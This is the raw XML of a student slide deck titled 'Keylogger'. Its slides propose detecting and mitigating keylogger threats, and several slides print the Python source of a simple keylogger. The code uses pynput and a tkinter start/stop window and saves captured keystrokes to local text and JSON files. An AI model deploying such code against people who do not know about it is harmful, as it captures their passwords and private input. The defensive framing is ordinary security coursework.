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419871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04180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421788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874826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613508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3863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20423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534799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96814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06065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4D87D2-037A-47DF-8B8A-3C1BD914A70B}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>19-06-2024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1610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4D87D2-037A-47DF-8B8A-3C1BD914A70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408959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4D87D2-037A-47DF-8B8A-3C1BD914A70B}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>19-06-2024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56698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D87D2-037A-47DF-8B8A-3C1BD914A70B}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>19-06-2024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3232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D87D2-037A-47DF-8B8A-3C1BD914A70B}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>19-06-2024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22535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121398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4D87D2-037A-47DF-8B8A-3C1BD914A70B}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>19-06-2024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DBFC5-16B5-4B56-AAE7-757EBE907F80}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30252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4D87D2-037A-47DF-8B8A-3C1BD914A70B}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>19-06-2024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EDBFC5-16B5-4B56-AAE7-757EBE907F80}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3887980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3A42-86D0-78AE-FAA7-5741DCE0A936}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>P. DHRUTHI ROY</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A04E6A3A-D0D3-1E82-C53D-DC337577F176}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0"/>
              <a:t>THE FINAL PROJECT : KEYLOGGER</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="306186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C5597-FDD2-87F9-20FC-17E70FF4E28E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1691149" y="197346"/>
            <a:ext cx="9615948" cy="6463308"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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listener.stop</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label.config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(text="Keylogger stopped.")</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start_button.config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(state='normal')</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stop_button.config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(state='disabled')</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root = Tk()</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root.title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("Keylogger")</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label = Label(root, text='Click "Start" to begin keylogging.')</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label.config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(anchor=CENTER)</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label.pack</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start_button</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 Button(root, text="Start", command=</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start_keylogger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start_button.pack</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(side=LEFT)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stop_button</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 Button(root, text="Stop", command=</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stop_keylogger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state='disabled')</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stop_button.pack</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(side=RIGHT)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root.geometry</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("250x250")</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root.mainloop</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34471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47B97-E1F2-0CAD-983C-FE0FF69FBC88}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1907458" y="528795"/>
            <a:ext cx="1986116" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>OUTPUT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">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1907458" y="1229533"/>
            <a:ext cx="2392887" cy="2629128"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9D4769C-36A6-FEDA-4635-8774E0B9E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830" y="4344339"/>
            <a:ext cx="10197035" cy="1514686"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="67590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DF12E-55ED-C119-106B-92385F1800A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1671484" y="1105445"/>
            <a:ext cx="4247535" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>CONCLUSION :</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91336241-EBB0-6CCB-9EF0-2D56EF88FD58}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1671484" y="2428568"/>
            <a:ext cx="8849032" cy="2862322"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>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 the face of increasing keylogger threats, our proposed framework provides a complete solution to enhance organizational cybersecurity. By combining real-time analytics, robust prevention strategies, and effective mitigation strategies, we can significantly reduce the risk of keylogger attacks and create critical information protect Use advanced technologies such as network traffic analysis, machine learning modeling and endpoint security solutions.</a:t>
            </a:r>
          </a:p>
          <a:p>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Ultimately, this integrated security strategy will provide robust security, ensuring the integrity and confidentiality of the organization’s data and strengthening overall network security.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8647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098FDF-3998-C75C-9496-9981AD070DDB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1691148" y="1327355"/>
            <a:ext cx="4699820" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>https://github.com/DhruthiRoy04/keylogger</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1BB4199-4C97-A744-6834-3A6931D35F22}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1691148" y="1047758"/>
            <a:ext cx="2084438" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PROJECT LINK: </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1745467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48655-86B6-D9AF-743D-9D7CDF5EA05A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2998838" y="1563328"/>
            <a:ext cx="6882581" cy="3046988"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="9600" dirty="0"/>
              <a:t>THANK </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="9600" dirty="0"/>
              <a:t>           YOU</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="9600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="60009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0B40-2402-2DA2-422A-CC639113FF6E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="166788" y="666136"/>
            <a:ext cx="10018713" cy="1752599"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>PROJECT NAME : KEYLOGGER</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD8B0EB9-CECF-F291-B6DE-A223B2C2F5BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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presentation will delve into the </a:t>
            </a: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Keylogger Project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exploring its role in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="20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monitoring</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providing </a:t>
            </a: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insight</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 will discuss its applications, implications, and potential benefits for organizations and individuals.</a:t>
            </a:r>
          </a:p>
          <a:p>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Keyloggers are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stealthy</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tools designed to capture </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="20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keystrokes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a computer or mobile device. They can record sensitive information such as passwords, usernames, and financial data. Understanding their operation is crucial for </a:t>
            </a:r>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measures</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32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BC465-A75D-263F-15E3-BF8BB58C3B05}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1897627" y="1215710"/>
            <a:ext cx="6410632" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0"/>
              <a:t>PROBLEM STATEMENT:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF2C5345-A76C-5553-C5E5-7D963857C4F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1828801" y="2841523"/>
            <a:ext cx="6912077" cy="2800767"/>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MONITORING AND SECURITY INSIGHT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Keyloggers are malicious programs that record keystrokes to steal sensitive data like passwords and financial information. They pose a significant threat to organizational security, potentially leading to severe data breaches and financial losses. This project aims to develop and implement effective detection, prevention, and mitigation strategies against keylogger attacks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="139853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03F04-4364-AF08-74BA-2DCA630B9E96}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1838632" y="1368629"/>
            <a:ext cx="7443019" cy="3785652"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>PROPOSED SOLUTION</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:ea typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>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effectively manage keylogger threats, we offer comprehensive security measures including detection, prevention and mitigation strategies. The system will include real-time monitoring and analysis of network traffic and system behavior to detect keyloggers. It will include comprehensive endpoint security solutions and enforce strict access management. In addition, regular employee training on cybersecurity best practices will be implemented</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Roboto" panose="020F0502020204030204" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18530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F9F44-D18B-6184-717B-6F8DCB0DEFB4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2133599" y="825910"/>
            <a:ext cx="7492181" cy="4308872"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SYSTEM DEVELOPMENT APPROACH:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:effectLst/>
              <a:highlight>
                <a:srgbClr val="F7F7F8"/>
              </a:highlight>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374151"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Analysis: Develop real-time strategies to detect keyloggers by analyzing network traffic and system behavior, using heuristic and machine learning models</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="20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374151"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Prevent: Enhance endpoint security with advanced anti-malware solutions, enforce strong access controls, and train employees on cybersecurity best practices</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="20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374151"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Mitigation: Establish incident response protocols, ensure regular system updates and patches, and use data encryption to protect sensitive information.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247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88E0C4-97F7-0AA2-CF4C-143FF3E8B4C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1592825" y="643622"/>
            <a:ext cx="9183329" cy="5570756"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Search Algorithms:</a:t>
            </a:r>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p>
          <a:p>
            <a:endPar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 Collection: Continuously collect data on network traffic and system behavior. Feature extraction: Identify features that determine keylogger activity, such as common keystrokes and unusual outliers. </a:t>
            </a:r>
          </a:p>
          <a:p>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Model training: Train a machine learning model using labeled data sets of normal and keylogger-infected behavior.</a:t>
            </a:r>
          </a:p>
          <a:p>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Real-time analysis: Use models in real-time to analyze incoming data and identify keyloggers. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endPar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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Methods Used: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endPar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Staging Environment: Test the system in a controlled staging environment to ensure performance and accuracy. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="20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Phased rollout: Start with high-risk departments and gradually roll out the program throughout the organization. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="275739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B296EE-064E-316F-AB9A-EC36DAEA4842}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1553497" y="471949"/>
            <a:ext cx="3244645" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>SOURCE CODE :</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77F668BF-7AA7-6B36-D75C-40615B3749D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1553497" y="1076631"/>
            <a:ext cx="9684774" cy="5355312"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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import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tkinter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as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tk</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from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tkinter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import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from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pynput</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import keyboard</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import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json</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flag = False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keys =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def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generate_text_log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with open('key_log.txt', "w+") as keys:</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keys.write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def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generate_json_file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with open('</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key_log.json</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wb</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as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key_log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key_list_bytes</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json.dumps</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).encode()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key_log.write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key_list_bytes</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63486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9588A-0097-01E0-CCA6-71EEB44F2DCC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1789470" y="491612"/>
            <a:ext cx="9871588" cy="6186309"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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def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on_press</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global flag,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keys</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if flag == False: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keys_used.append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{'Pressed': f'{key}'}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flag = True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if flag == True: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keys_used.append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{'Held': f'{key}'}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generate_json_file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def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on_release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global flag,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keys</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keys_used.append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{'Released': f'{key}'}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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="209095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B91A2E-7DC1-76DD-195A-8BA0FE89226F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1828800" y="639097"/>
            <a:ext cx="9419303" cy="5355312"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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if flag == True: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flag = False</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generate_json_file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keys_used</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keys = keys + str(key)</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generate_text_log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(str(keys))</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def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start_keylogger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global listener</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listener =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keyboard.Listener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on_press</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on_press</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on_release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on_release</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listener.start</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label.config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(text="[+] Keylogger is running!\n[!] Saving the keys in 'keylogger.txt'")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start_button.config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(state='disabled')</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stop_button.config</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(state='normal')</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def </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" kern="100" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Cordia New" panose="020B0304020202020204" pitchFamily="34" charset="-34"/>
              </a:rPr>
              <a:t>stop_keylogger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Cordia New" panose="020B0304020202020204" pitchFamily="34" charset="-34"/>
              </a:rPr>
              <a:t>():</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1800" kern="100" dirty="0">
